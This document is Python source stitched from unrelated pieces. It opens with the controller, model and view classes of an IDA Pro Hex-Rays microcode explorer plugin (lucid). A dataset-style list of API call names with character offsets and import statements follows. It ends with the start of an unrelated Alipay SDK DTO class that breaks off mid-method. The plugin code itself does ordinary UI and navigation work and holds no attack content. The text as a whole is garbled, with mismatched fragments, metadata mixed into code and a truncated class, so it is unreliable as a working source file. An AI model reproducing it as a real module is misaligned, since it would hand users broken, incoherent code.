    #-------------------------------------------------------------------------

    def set_highlight_mutual(self, status):
        """
        Toggle the highlighting of lines containing the same active address.
        """
        if status:
            self.view._code_sync.hook()
        else:
            self.view._code_sync.unhook()

        # redraw so the (un)highlighting takes effect immediately
        ida_kernwin.refresh_idaview_anyway()

    def set_verbose(self, status):
        """
        Toggle the verbosity of the printed microcode text.
        """
        self.model.verbose = status
        ida_kernwin.refresh_idaview_anyway()

    #-------------------------------------------------------------------------
    # View Controls
    #-------------------------------------------------------------------------

    def select_function(self, address):
        """
        Switch the microcode view to the function containing *address*.

        Returns True on success, False if no function exists there.
        """
        func = ida_funcs.get_func(address)
        if not func:
            return False

        # regenerate the rendered microcode text at every maturity level
        for maturity in get_mmat_levels():
            mba = get_microcode(func, maturity)
            self.model.update_mtext(MicrocodeText(mba, self.model.verbose), maturity)

        self.view.refresh()
        ida_kernwin.refresh_idaview_anyway()
        return True

    def select_maturity(self, maturity_name):
        """
        Switch the microcode view to the specified maturity level.
        """
        self.model.active_maturity = get_mmat(maturity_name)

    def select_address(self, address):
        """
        Select a token in the microcode view matching the given address.

        Returns the selected token, or None when no token maps to *address*.
        """
        matches = self.model.mtext.get_tokens_for_address(address)
        if not matches:
            return None

        token = matches[0]
        line_num, x = self.model.mtext.get_pos_of_token(token)

        # keep the current vertical viewport offset, defaulting to 30 when unset
        rel_y = self.model.current_position[2]
        if rel_y == 0:
            rel_y = 30

        self.model.current_position = (line_num, x, rel_y)
        return token

    def select_position(self, line_num, x, y):
        """
        Select the given text position in the microcode view.
        """
        self.model.current_position = (line_num, x, y)

    def activate_position(self, line_num, x, y):
        """
        Activate (eg. double click) the given text position in the microcode view.
        """
        token = self.model.mtext.get_token_at_position(line_num, x)

        # address tokens navigate the main IDA view to their target address
        if isinstance(token, AddressToken):
            ida_kernwin.jumpto(token.target_address, -1, 0)
            return

        # block references jump the microcode view to the start of that block
        is_blk_ref = isinstance(token, BlockNumberToken)
        is_blk_mop = isinstance(token, MicroOperandToken) and token.mop.t == ida_hexrays.mop_b
        if is_blk_ref or is_blk_mop:
            blk_idx = token.blk_idx if is_blk_ref else token.mop.b
            blk_token = self.model.mtext.blks[blk_idx]
            blk_line_num, _ = self.model.mtext.get_pos_of_token(blk_token.lines[0])
            self.model.current_position = (blk_line_num, 0, y)
            self.view._code_view.Jump(*self.model.current_position)
            return
class MicrocodeExplorerModel(object):
    """
    The model component of the microcode explorer.
    The role of the model is to encapsulate application state, respond to
    state queries, and notify views of changes. Ideally, the model could be
    serialized / unserialized to save and restore state.
    """
    def __init__(self):
        #
        # 'mtext' is short for MicrocodeText objects (see microtext.py)
        #
        # this dictionary will contain a mtext object (the renderable text
        # mapping of a given hexrays mba_t) for each microcode maturity level
        # of the current function.
        #
        # at any given time, one mtext will be 'active' in the model, and
        # therefore visible in the UI/Views
        #
        self._mtext = {x: None for x in get_mmat_levels()}
        #
        # there is a 'cursor' (ViewCursor) for each microcode maturity level /
        # mtext object. cursors don't actually contain the 'position' in the
        # rendered text (line_num, x), but also information to position the
        # cursor within the line view (y)
        #
        self._view_cursors = {x: None for x in get_mmat_levels()}
        #
        # the currently active / selected maturity level of the model. this
        # determines which mtext is currently visible / active in the
        # microcode view, and which cursor will be used
        #
        self._active_maturity = ida_hexrays.MMAT_GENERATED
        # this flag tracks the verbosity toggle state
        self._verbose = False
        #----------------------------------------------------------------------
        # Callbacks
        #----------------------------------------------------------------------
        # listeners subscribed to model change events, registered through the
        # mtext_refreshed / position_changed / maturity_changed methods below
        self._mtext_refreshed_callbacks = []
        self._position_changed_callbacks = []
        self._maturity_changed_callbacks = []
    #-------------------------------------------------------------------------
    # Read-Only Properties
    #-------------------------------------------------------------------------
    @property
    def mtext(self):
        """
        Return the microcode text mapping for the current maturity level.
        """
        return self._mtext[self._active_maturity]
    @property
    def current_line(self):
        """
        Return the line token at the current viewport cursor position.
        """
        if not self.mtext:
            return None
        line_num, _, _ = self.current_position
        return self.mtext.lines[line_num]
    @property
    def current_function(self):
        """
        Return the current function address (BADADDR when nothing is loaded).
        """
        if not self.mtext:
            return ida_idaapi.BADADDR
        return self.mtext.mba.entry_ea
    @property
    def current_token(self):
        """
        Return the token at the current viewport cursor position.
        """
        return self.mtext.get_token_at_position(*self.current_position[:2])
    @property
    def current_address(self):
        """
        Return the address at the current viewport cursor position.
        """
        return self.mtext.get_address_at_position(*self.current_position[:2])
    @property
    def current_cursor(self):
        """
        Return the current viewport cursor (ViewCursor).
        """
        return self._view_cursors[self._active_maturity]
    #-------------------------------------------------------------------------
    # Mutable Properties
    #-------------------------------------------------------------------------
    @property
    def current_position(self):
        """
        Return the current viewport cursor position (line_num, view_x, view_y).
        """
        return self.current_cursor.viewport_position
    @current_position.setter
    def current_position(self, value):
        """
        Set the cursor position of the viewport.
        """
        # re-project the cursor into every maturity level, then notify views
        self._gen_cursors(value, self.active_maturity)
        self._notify_position_changed()
    @property
    def verbose(self):
        """
        Return the microcode verbosity status of the viewport.
        """
        return self._verbose
    @verbose.setter
    def verbose(self, value):
        """
        Set the verbosity of the microcode displayed by the viewport.
        """
        if self._verbose == value:
            return
        # update the active verbosity setting
        self._verbose = value
        # verbosity must have changed, so force a mtext refresh
        self.refresh_mtext()
    @property
    def active_maturity(self):
        """
        Return the active microcode maturity level.
        """
        return self._active_maturity
    @active_maturity.setter
    def active_maturity(self, new_maturity):
        """
        Set the active microcode maturity level.
        """
        self._active_maturity = new_maturity
        self._notify_maturity_changed()
    #----------------------------------------------------------------------
    # Misc
    #----------------------------------------------------------------------
    def update_mtext(self, mtext, maturity):
        """
        Set the mtext for a given microcode maturity level.
        """
        # installing a new mtext resets that level's cursor to the origin
        self._mtext[maturity] = mtext
        self._view_cursors[maturity] = ViewCursor(0, 0, 0)
    def refresh_mtext(self):
        """
        Regenerate the rendered text for all microcode maturity levels.
        TODO: This is a bit sloppy, and is basically only used for the
        verbosity toggle.
        """
        for maturity, mtext in self._mtext.items():
            # the active level is rebuilt from scratch, and the current cursor
            # is translated from the old mtext into the newly generated one
            if maturity == self.active_maturity:
                new_mtext = MicrocodeText(mtext.mba, self.verbose)
                self._mtext[maturity] = new_mtext
                self.current_position = translate_mtext_position(self.current_position, mtext, new_mtext)
                continue
            mtext.refresh(self.verbose)
        self._notify_mtext_refreshed()
    def _gen_cursors(self, position, mmat_src):
        """
        Generate the cursors for all levels from a source position and maturity.
        """
        # NOTE: assumes maturity levels are contiguous integers, since range()
        # is used to walk between them below -- TODO confirm against hexrays
        mmat_levels = get_mmat_levels()
        mmat_first, mmat_final = mmat_levels[0], mmat_levels[-1]
        # clear out all the existing cursor mappings
        self._view_cursors = {x: None for x in mmat_levels}
        # save the starting cursor
        line_num, x, y = position
        self._view_cursors[mmat_src] = ViewCursor(line_num, x, y, True)
        # map the cursor backwards from the source maturity
        mmat_lower = range(mmat_first, mmat_src)[::-1]
        current_maturity = mmat_src
        for next_maturity in mmat_lower:
            self._transfer_cursor(current_maturity, next_maturity)
            current_maturity = next_maturity
        # map the cursor forward from the source maturity
        mmat_higher = range(mmat_src+1, mmat_final + 1)
        current_maturity = mmat_src
        for next_maturity in mmat_higher:
            self._transfer_cursor(current_maturity, next_maturity)
            current_maturity = next_maturity
    def _transfer_cursor(self, mmat_src, mmat_dst):
        """
        Translate the cursor position from one maturity to the next.
        """
        position = self._view_cursors[mmat_src].viewport_position
        mapped = self._view_cursors[mmat_src].mapped
        # attempt to translate the position in one mtext to another
        projection = translate_mtext_position(position, self._mtext[mmat_src], self._mtext[mmat_dst])
        # if translation failed, we will generate an approximate cursor;
        # mapped=False marks the cursor as approximated rather than exact
        if not projection:
            mapped = False
            projection = remap_mtext_position(position, self._mtext[mmat_src], self._mtext[mmat_dst])
        # save the generated cursor
        line_num, x, y = projection
        self._view_cursors[mmat_dst] = ViewCursor(line_num, x, y, mapped)
    #----------------------------------------------------------------------
    # Callbacks
    #----------------------------------------------------------------------
    def mtext_refreshed(self, callback):
        """
        Subscribe a callback for mtext refresh events.
        """
        register_callback(self._mtext_refreshed_callbacks, callback)
    def _notify_mtext_refreshed(self):
        """
        Notify listeners of a mtext refresh event.
        """
        notify_callback(self._mtext_refreshed_callbacks)
    def position_changed(self, callback):
        """
        Subscribe a callback for cursor position changed events.
        """
        register_callback(self._position_changed_callbacks, callback)
    def _notify_position_changed(self):
        """
        Notify listeners of a cursor position changed event.
        """
        notify_callback(self._position_changed_callbacks)
    def maturity_changed(self, callback):
        """
        Subscribe a callback for maturity changed events.
        """
        register_callback(self._maturity_changed_callbacks, callback)
    def _notify_maturity_changed(self):
        """
        Notify listeners of a maturity changed event.
        """
        notify_callback(self._maturity_changed_callbacks)
#-----------------------------------------------------------------------------
# UI Components
#-----------------------------------------------------------------------------
class MicrocodeExplorerView(QtWidgets.QWidget):
    """
    The view component of the Microcode Explorer.

    Owns the Qt widget hierarchy (maturity list, microcode text view, and
    settings groupbox) and wires UI signals through to the controller.
    """
    WINDOW_TITLE = "Microcode Explorer"
    def __init__(self, controller, model):
        super(MicrocodeExplorerView, self).__init__()
        self.visible = False
        # the backing model, and controller for this view (eg, mvc pattern)
        self.model = model
        self.controller = controller
        # initialize the plugin UI
        self._ui_init()
        self._ui_init_signals()
    #--------------------------------------------------------------------------
    # Pseudo Widget Functions
    #--------------------------------------------------------------------------
    def show(self):
        """
        Display the dockable explorer widget, docked to the right of IDA.
        """
        self.refresh()
        # show the dockable widget
        flags = ida_kernwin.PluginForm.WOPN_DP_RIGHT | 0x200 # WOPN_SZHINT
        ida_kernwin.display_widget(self._twidget, flags)
        ida_kernwin.set_dock_pos(self.WINDOW_TITLE, "IDATopLevelDockArea", ida_kernwin.DP_RIGHT)
        self._code_sync.hook()
    def _cleanup(self):
        """
        Drop widget references and unhook listeners when the container closes.
        """
        self.visible = False
        self._twidget = None
        self.widget = None
        self._code_sync.unhook()
        self._ui_hooks.unhook()
        # TODO cleanup controller / model
    #--------------------------------------------------------------------------
    # Initialization - UI
    #--------------------------------------------------------------------------
    def _ui_init(self):
        """
        Initialize UI elements.
        """
        self._ui_init_widget()
        # initialize our ui elements
        self._ui_init_list()
        self._ui_init_code()
        self._ui_init_settings()
        # layout the populated ui just before showing it
        self._ui_layout()
    def _ui_init_widget(self):
        """
        Initialize an IDA widget for this UI control.
        """
        # create a dockable widget, and save a reference to it for later use
        self._twidget = ida_kernwin.create_empty_widget(self.WINDOW_TITLE)
        # cast the IDA 'twidget' to a less opaque QWidget object
        self.widget = ida_kernwin.PluginForm.TWidgetToPyQtWidget(self._twidget)
        # hooks to help track the container/widget lifetime
        # NOTE: '_' is the hook instance itself; 'self' closes over the view
        class ExplorerUIHooks(ida_kernwin.UI_Hooks):
            def widget_invisible(_, twidget):
                if twidget == self._twidget:
                    self.visible = False
                    self._cleanup()
            def widget_visible(_, twidget):
                if twidget == self._twidget:
                    self.visible = True
        # install the widget lifetime hooks
        self._ui_hooks = ExplorerUIHooks()
        self._ui_hooks.hook()
    def _ui_init_list(self):
        """
        Initialize the microcode maturity list.
        """
        self._maturity_list = LayerListWidget()
    def _ui_init_code(self):
        """
        Initialize the microcode view(s).
        """
        self._code_view = MicrocodeView(self.model)
        self._code_sync = MicroCursorHighlight(self.controller, self.model)
        self._code_sync.track_view(self._code_view.widget)
    def _ui_init_settings(self):
        """
        Initialize the explorer settings groupbox.
        """
        self._checkbox_cursor = QtWidgets.QCheckBox("Highlight mutual")
        self._checkbox_cursor.setCheckState(QtCore.Qt.Checked)
        self._checkbox_verbose = QtWidgets.QCheckBox("Show use/def")
        self._checkbox_sync = QtWidgets.QCheckBox("Sync hexrays")
        self._checkbox_sync.setCheckState(QtCore.Qt.Checked)
        self._groupbox_settings = QtWidgets.QGroupBox("Settings")
        layout = QtWidgets.QVBoxLayout()
        layout.addWidget(self._checkbox_cursor)
        layout.addWidget(self._checkbox_verbose)
        layout.addWidget(self._checkbox_sync)
        self._groupbox_settings.setLayout(layout)
    def _ui_layout(self):
        """
        Layout the major UI elements of the widget.
        """
        layout = QtWidgets.QGridLayout()
        # arrange the widgets in a 'grid': (widget, row, col, row span, col span)
        layout.addWidget(self._code_view.widget, 0, 0, 0, 1)
        layout.addWidget(self._maturity_list, 0, 1, 1, 1)
        layout.addWidget(self._groupbox_settings, 1, 1, 1, 1)
        # apply the layout to the widget
        self.widget.setLayout(layout)
    def _ui_init_signals(self):
        """
        Connect UI signals.
        """
        self._maturity_list.currentItemChanged.connect(lambda x, y: self.controller.select_maturity(x.text()))
        self._code_view.connect_signals(self.controller)
        self._code_view.OnClose = self.hide # HACK
        # checkboxes
        self._checkbox_cursor.stateChanged.connect(lambda x: self.controller.set_highlight_mutual(bool(x)))
        self._checkbox_verbose.stateChanged.connect(lambda x: self.controller.set_verbose(bool(x)))
        self._checkbox_sync.stateChanged.connect(lambda x: self._code_sync.enable_sync(bool(x)))
        # model signals
        self.model.mtext_refreshed(self.refresh)
        self.model.maturity_changed(self.refresh)
    #--------------------------------------------------------------------------
    # Misc
    #--------------------------------------------------------------------------
    def refresh(self):
        """
        Refresh the microcode explorer UI based on the model state.
        """
        # NOTE(review): assumes maturity constants start at 1 while list rows
        # are 0-based, hence the -1 -- confirm against get_mmat_levels()
        self._maturity_list.setCurrentRow(self.model.active_maturity - 1)
        self._code_view.refresh()
class LayerListWidget(QtWidgets.QListWidget):
    """
    List widget presenting the available microcode maturity layers.
    """

    def __init__(self):
        super(LayerListWidget, self).__init__()

        # fill the list with one entry per microcode maturity level
        names = [get_mmat_name(mmat) for mmat in get_mmat_levels()]
        self.addItems(names)

        # default-select the first (earliest) maturity level
        self.setCurrentRow(0)

        # pin the widget width slightly (10%) wider than its natural size hint
        hint = self.sizeHintForColumn(0)
        self.setMaximumWidth(int(hint + hint * 0.10))

    def wheelEvent(self, event):
        """
        Step the selected row in response to mouse wheel scroll events.
        """
        delta = event.angleDelta().y()

        # horizontal scroll? nothing to do..
        if delta == 0:
            return

        if delta < 0:
            # scrolling down, clamp to last row
            target = min(self.currentRow() + 1, self.count() - 1)
        else:
            # scrolling up, clamp to first row (0)
            target = max(self.currentRow() - 1, 0)

        self.setCurrentRow(target)
class MicrocodeView(ida_kernwin.simplecustviewer_t):
    """
    An IDA-based text area that will render the Hex-Rays microcode.
    TODO: I'll probably rip this out in the future, as I'll have finer
    control over the interaction / implementation if I just roll my own
    microcode text widget.
    For that reason, excuse its hacky-ness / lack of comments.
    """
    def __init__(self, model):
        super(MicrocodeView, self).__init__()
        self.model = model
        self.Create()
    def connect_signals(self, controller):
        # route viewer events into the controller: cursor moves select a
        # position, double-clicks activate it
        self.controller = controller
        self.OnCursorPosChanged = lambda: controller.select_position(*self.GetPos())
        self.OnDblClick = lambda _: controller.activate_position(*self.GetPos())
        # keep the on-screen cursor in sync with the model's position
        self.model.position_changed(self.refresh_cursor)
    def refresh(self):
        # re-render the full microcode listing from the model's text lines
        self.ClearLines()
        for line in self.model.mtext.lines:
            self.AddLine(line.tagged_text)
        self.refresh_cursor()
    def refresh_cursor(self):
        # jump the viewer cursor to the model's current position, if any
        if not self.model.current_position:
            return
        self.Jump(*self.model.current_position)
    def Create(self):
        if not super(MicrocodeView, self).Create(None):
            return False
        # keep both the raw IDA widget and its Qt wrapper around
        self._twidget = self.GetWidget()
        self.widget = ida_kernwin.PluginForm.TWidgetToPyQtWidget(self._twidget)
        return True
    def OnClose(self):
        pass
    def OnCursorPosChanged(self):
        # placeholder; replaced per-instance in connect_signals()
        pass
    def OnDblClick(self, shift):
        # placeholder; replaced per-instance in connect_signals()
        pass
    def OnPopup(self, form, popup_handle):
        controller = self.controller
        #
        # so, i'm pretty picky about my UI / interactions. IDA puts items in
        # the right click context menus of custom (code) viewers.
        #
        # these items aren't really relevant (imo) to the microcode viewer,
        # so I do some dirty stuff here to filter them out and ensure only
        # my items will appear in the context menu.
        #
        # there's only one right click context item right now, but in the
        # future i'm sure there will be more.
        #
        class FilterMenu(QtCore.QObject):
            # one-shot event filter that strips IDA's default menu items
            def __init__(self, qmenu):
                super(QtCore.QObject, self).__init__()
                self.qmenu = qmenu
            def eventFilter(self, obj, event):
                if event.type() != QtCore.QEvent.Polish:
                    return False
                for action in self.qmenu.actions():
                    if action.text() in ["&Font...", "&Synchronize with"]: # lol..
                        qmenu.removeAction(action)
                # detach once the menu has been sanitized
                self.qmenu.removeEventFilter(self)
                self.qmenu = None
                return True
        # wrap the raw popup handle into a usable QMenu object
        p_qmenu = ctypes.cast(int(popup_handle), ctypes.POINTER(ctypes.c_void_p))[0]
        qmenu = sip.wrapinstance(int(p_qmenu), QtWidgets.QMenu)
        self.filter = FilterMenu(qmenu)
        qmenu.installEventFilter(self.filter)
        # only handle right clicks on lines containing micro instructions
        ins_token = self.model.mtext.get_ins_for_line(self.model.current_line)
        if not ins_token:
            return False
        class MyHandler(ida_kernwin.action_handler_t):
            def activate(self, ctx):
                controller.show_subtree(ins_token)
            def update(self, ctx):
                return ida_kernwin.AST_ENABLE_ALWAYS
        # inject the 'View subtree' action into the right click context menu
        desc = ida_kernwin.action_desc_t(None, 'View subtree', MyHandler())
        ida_kernwin.attach_dynamic_action_to_popup(form, popup_handle, desc, None)
        return True
#-----------------------------------------------------------------------------
# Util
#-----------------------------------------------------------------------------
class ViewCursor(object):
    """
    A cursor location within a text view.

    Attributes:
        line_num: line number within the view's text
        x: horizontal cursor coordinate (column)
        y: second viewport coordinate (presumably the on-screen y --
           confirm against the viewer's GetPos()/Jump() convention)
        mapped: whether this cursor could be mapped (default True)
    """
    def __init__(self, line_num, x, y, mapped=True):
        self.line_num = line_num
        self.x = x
        self.y = y
        self.mapped = mapped
    def __repr__(self):
        # added for debuggability; the original class had only a TODO docstring
        return "%s(line_num=%r, x=%r, y=%r, mapped=%r)" % (
            type(self).__name__, self.line_num, self.x, self.y, self.mapped)
    @property
    def text_position(self):
        """Return the (line_num, x) pair for text addressing."""
        return (self.line_num, self.x)
    @property
    def viewport_position(self):
        """Return the (line_num, x, y) triple for viewport addressing."""
        return (self.line_num, self.x, self.y)
| [
"ida_kernwin.jumpto",
"ida_kernwin.get_screen_ea",
"ida_kernwin.create_empty_widget",
"lucid.microtext.translate_mtext_position",
"ida_funcs.get_func",
"PyQt5.QtWidgets.QVBoxLayout",
"lucid.microtext.remap_mtext_position",
"ida_kernwin.PluginForm.TWidgetToPyQtWidget",
"PyQt5.QtWidgets.QGroupBox",
... | [((1926, 1959), 'lucid.ui.subtree.MicroSubtreeView', 'MicroSubtreeView', (['insn_token.insn'], {}), '(insn_token.insn)\n', (1942, 1959), False, 'from lucid.ui.subtree import MicroSubtreeView\n'), ((2164, 2208), 'ida_graph.viewer_set_titlebar_height', 'ida_graph.viewer_set_titlebar_height', (['gv', '(15)'], {}), '(gv, 15)\n', (2200, 2208), False, 'import ida_graph\n'), ((2656, 2692), 'ida_kernwin.refresh_idaview_anyway', 'ida_kernwin.refresh_idaview_anyway', ([], {}), '()\n', (2690, 2692), False, 'import ida_kernwin\n'), ((2857, 2893), 'ida_kernwin.refresh_idaview_anyway', 'ida_kernwin.refresh_idaview_anyway', ([], {}), '()\n', (2891, 2893), False, 'import ida_kernwin\n'), ((3218, 3245), 'ida_funcs.get_func', 'ida_funcs.get_func', (['address'], {}), '(address)\n', (3236, 3245), False, 'import ida_funcs\n'), ((3325, 3342), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (3340, 3342), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((3541, 3577), 'ida_kernwin.refresh_idaview_anyway', 'ida_kernwin.refresh_idaview_anyway', ([], {}), '()\n', (3575, 3577), False, 'import ida_kernwin\n'), ((3773, 3796), 'lucid.util.hexrays.get_mmat', 'get_mmat', (['maturity_name'], {}), '(maturity_name)\n', (3781, 3796), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((11755, 11772), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (11770, 11772), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((13061, 13146), 'lucid.microtext.translate_mtext_position', 'translate_mtext_position', (['position', 'self._mtext[mmat_src]', 'self._mtext[mmat_dst]'], {}), '(position, self._mtext[mmat_src], self._mtext[mmat_dst]\n )\n', (13085, 13146), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, 
remap_mtext_position\n'), ((13816, 13876), 'lucid.util.python.register_callback', 'register_callback', (['self._mtext_refreshed_callbacks', 'callback'], {}), '(self._mtext_refreshed_callbacks, callback)\n', (13833, 13876), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14000, 14048), 'lucid.util.python.notify_callback', 'notify_callback', (['self._mtext_refreshed_callbacks'], {}), '(self._mtext_refreshed_callbacks)\n', (14015, 14048), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14189, 14250), 'lucid.util.python.register_callback', 'register_callback', (['self._position_changed_callbacks', 'callback'], {}), '(self._position_changed_callbacks, callback)\n', (14206, 14250), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14385, 14434), 'lucid.util.python.notify_callback', 'notify_callback', (['self._position_changed_callbacks'], {}), '(self._position_changed_callbacks)\n', (14400, 14434), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14568, 14629), 'lucid.util.python.register_callback', 'register_callback', (['self._maturity_changed_callbacks', 'callback'], {}), '(self._maturity_changed_callbacks, callback)\n', (14585, 14629), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((14757, 14806), 'lucid.util.python.notify_callback', 'notify_callback', (['self._maturity_changed_callbacks'], {}), '(self._maturity_changed_callbacks)\n', (14772, 14806), False, 'from lucid.util.python import register_callback, notify_callback\n'), ((15860, 15908), 'ida_kernwin.display_widget', 'ida_kernwin.display_widget', (['self._twidget', 'flags'], {}), '(self._twidget, flags)\n', (15886, 15908), False, 'import ida_kernwin\n'), ((15917, 16009), 'ida_kernwin.set_dock_pos', 'ida_kernwin.set_dock_pos', (['self.WINDOW_TITLE', '"""IDATopLevelDockArea"""', 'ida_kernwin.DP_RIGHT'], {}), "(self.WINDOW_TITLE, 'IDATopLevelDockArea',\n 
ida_kernwin.DP_RIGHT)\n", (15941, 16009), False, 'import ida_kernwin\n'), ((16979, 17029), 'ida_kernwin.create_empty_widget', 'ida_kernwin.create_empty_widget', (['self.WINDOW_TITLE'], {}), '(self.WINDOW_TITLE)\n', (17010, 17029), False, 'import ida_kernwin\n'), ((17118, 17175), 'ida_kernwin.PluginForm.TWidgetToPyQtWidget', 'ida_kernwin.PluginForm.TWidgetToPyQtWidget', (['self._twidget'], {}), '(self._twidget)\n', (17160, 17175), False, 'import ida_kernwin\n'), ((18031, 18080), 'lucid.ui.sync.MicroCursorHighlight', 'MicroCursorHighlight', (['self.controller', 'self.model'], {}), '(self.controller, self.model)\n', (18051, 18080), False, 'from lucid.ui.sync import MicroCursorHighlight\n'), ((18281, 18320), 'PyQt5.QtWidgets.QCheckBox', 'QtWidgets.QCheckBox', (['"""Highlight mutual"""'], {}), "('Highlight mutual')\n", (18300, 18320), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((18417, 18452), 'PyQt5.QtWidgets.QCheckBox', 'QtWidgets.QCheckBox', (['"""Show use/def"""'], {}), "('Show use/def')\n", (18436, 18452), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((18483, 18518), 'PyQt5.QtWidgets.QCheckBox', 'QtWidgets.QCheckBox', (['"""Sync hexrays"""'], {}), "('Sync hexrays')\n", (18502, 18518), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((18623, 18654), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['"""Settings"""'], {}), "('Settings')\n", (18642, 18654), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((18672, 18695), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', ([], {}), '()\n', (18693, 18695), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((19009, 19032), 'PyQt5.QtWidgets.QGridLayout', 'QtWidgets.QGridLayout', ([], {}), '()\n', (19030, 19032), False, 'from PyQt5 import QtWidgets, QtGui, QtCore, sip\n'), ((22962, 23019), 'ida_kernwin.PluginForm.TWidgetToPyQtWidget', 'ida_kernwin.PluginForm.TWidgetToPyQtWidget', (['self._twidget'], {}), '(self._twidget)\n', (23004, 23019), 
False, 'import ida_kernwin\n'), ((25212, 25286), 'ida_kernwin.attach_dynamic_action_to_popup', 'ida_kernwin.attach_dynamic_action_to_popup', (['form', 'popup_handle', 'desc', 'None'], {}), '(form, popup_handle, desc, None)\n', (25254, 25286), False, 'import ida_kernwin\n'), ((1682, 1709), 'ida_kernwin.get_screen_ea', 'ida_kernwin.get_screen_ea', ([], {}), '()\n', (1707, 1709), False, 'import ida_kernwin\n'), ((3362, 3391), 'lucid.util.hexrays.get_microcode', 'get_microcode', (['func', 'maturity'], {}), '(func, maturity)\n', (3375, 3391), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((3412, 3450), 'lucid.microtext.MicrocodeText', 'MicrocodeText', (['mba', 'self.model.verbose'], {}), '(mba, self.model.verbose)\n', (3425, 3450), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((5064, 5111), 'ida_kernwin.jumpto', 'ida_kernwin.jumpto', (['token.target_address', '(-1)', '(0)'], {}), '(token.target_address, -1, 0)\n', (5082, 5111), False, 'import ida_kernwin\n'), ((13294, 13370), 'lucid.microtext.remap_mtext_position', 'remap_mtext_position', (['position', 'self._mtext[mmat_src]', 'self._mtext[mmat_dst]'], {}), '(position, self._mtext[mmat_src], self._mtext[mmat_dst])\n', (13314, 13370), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((6446, 6463), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (6461, 6463), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((6809, 6826), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (6824, 6826), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((11280, 11318), 
'lucid.microtext.MicrocodeText', 'MicrocodeText', (['mtext.mba', 'self.verbose'], {}), '(mtext.mba, self.verbose)\n', (11293, 11318), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((11409, 11474), 'lucid.microtext.translate_mtext_position', 'translate_mtext_position', (['self.current_position', 'mtext', 'new_mtext'], {}), '(self.current_position, mtext, new_mtext)\n', (11433, 11474), False, 'from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position\n'), ((20865, 20881), 'lucid.util.hexrays.get_mmat_name', 'get_mmat_name', (['x'], {}), '(x)\n', (20878, 20881), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n'), ((24427, 24458), 'ctypes.POINTER', 'ctypes.POINTER', (['ctypes.c_void_p'], {}), '(ctypes.c_void_p)\n', (24441, 24458), False, 'import ctypes\n'), ((20891, 20908), 'lucid.util.hexrays.get_mmat_levels', 'get_mmat_levels', ([], {}), '()\n', (20906, 20908), False, 'from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.PaidOuterCardCycleSellConfDTO import PaidOuterCardCycleSellConfDTO
from alipay.aop.api.domain.PaidOuterCardManageUrlConfDTO import PaidOuterCardManageUrlConfDTO
from alipay.aop.api.domain.PaidOuterCardSellingConfDTO import PaidOuterCardSellingConfDTO
class PaidOuterCardTemplateConfDTO(object):
    """Template configuration for a paid outer card.

    Holds three optional sub-configurations (cycle selling, manage URL,
    open selling) and converts to/from the alipay dict wire format.
    """

    def __init__(self):
        self._cycle_selling_conf = None
        self._manage_url_conf = None
        self._open_selling_conf = None

    @property
    def cycle_selling_conf(self):
        return self._cycle_selling_conf

    @cycle_selling_conf.setter
    def cycle_selling_conf(self, value):
        # accept either a ready DTO instance or a raw dict to be parsed
        self._cycle_selling_conf = value if isinstance(value, PaidOuterCardCycleSellConfDTO) \
            else PaidOuterCardCycleSellConfDTO.from_alipay_dict(value)

    @property
    def manage_url_conf(self):
        return self._manage_url_conf

    @manage_url_conf.setter
    def manage_url_conf(self, value):
        # accept either a ready DTO instance or a raw dict to be parsed
        self._manage_url_conf = value if isinstance(value, PaidOuterCardManageUrlConfDTO) \
            else PaidOuterCardManageUrlConfDTO.from_alipay_dict(value)

    @property
    def open_selling_conf(self):
        return self._open_selling_conf

    @open_selling_conf.setter
    def open_selling_conf(self, value):
        # accept either a ready DTO instance or a raw dict to be parsed
        self._open_selling_conf = value if isinstance(value, PaidOuterCardSellingConfDTO) \
            else PaidOuterCardSellingConfDTO.from_alipay_dict(value)

    def to_alipay_dict(self):
        """Serialize to the alipay request dict, omitting unset fields."""
        params = dict()
        for key in ('cycle_selling_conf', 'manage_url_conf', 'open_selling_conf'):
            value = getattr(self, key)
            if value:
